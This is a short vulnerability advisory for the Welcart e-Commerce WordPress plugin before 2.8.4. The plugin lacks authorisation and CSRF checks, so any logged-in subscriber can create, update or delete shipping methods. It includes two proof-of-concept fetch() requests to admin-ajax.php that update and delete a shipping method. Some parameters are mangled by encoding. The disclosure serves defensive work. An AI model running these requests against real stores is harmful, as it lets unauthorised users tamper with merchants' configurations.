Welcart e-Commerce < 2.8.4 - Subscriber+ Arbitrary Shipping Method Creation/Update/Deletion

The plugin does not have authorisation and CSRF in an AJAX action, allowing any logged-in user to create, update and delete shipping methods.

PoC

wp_ajax_shop_options_ajax hook calls shop_options_ajax() function without nonce and without access control update shipping method name (#0 shipping method id) exploit: fetch(‘http://localhost/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=shop_options_ajax&mode;=update_delivery_method&name;=UPDATE&id;=0&time;=&charge;=-1&days;=-1&nocod;=0&intl;=0&cool;_category=0’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error)); The exploit requires at least a subscriber role. -– delete shipping method (#0 shipping method id) exploit: fetch(‘http://localhost/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=shop_options_ajax&mode;=delete_delivery_method&id;=0’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error)); The exploit requires at least a subscriber role.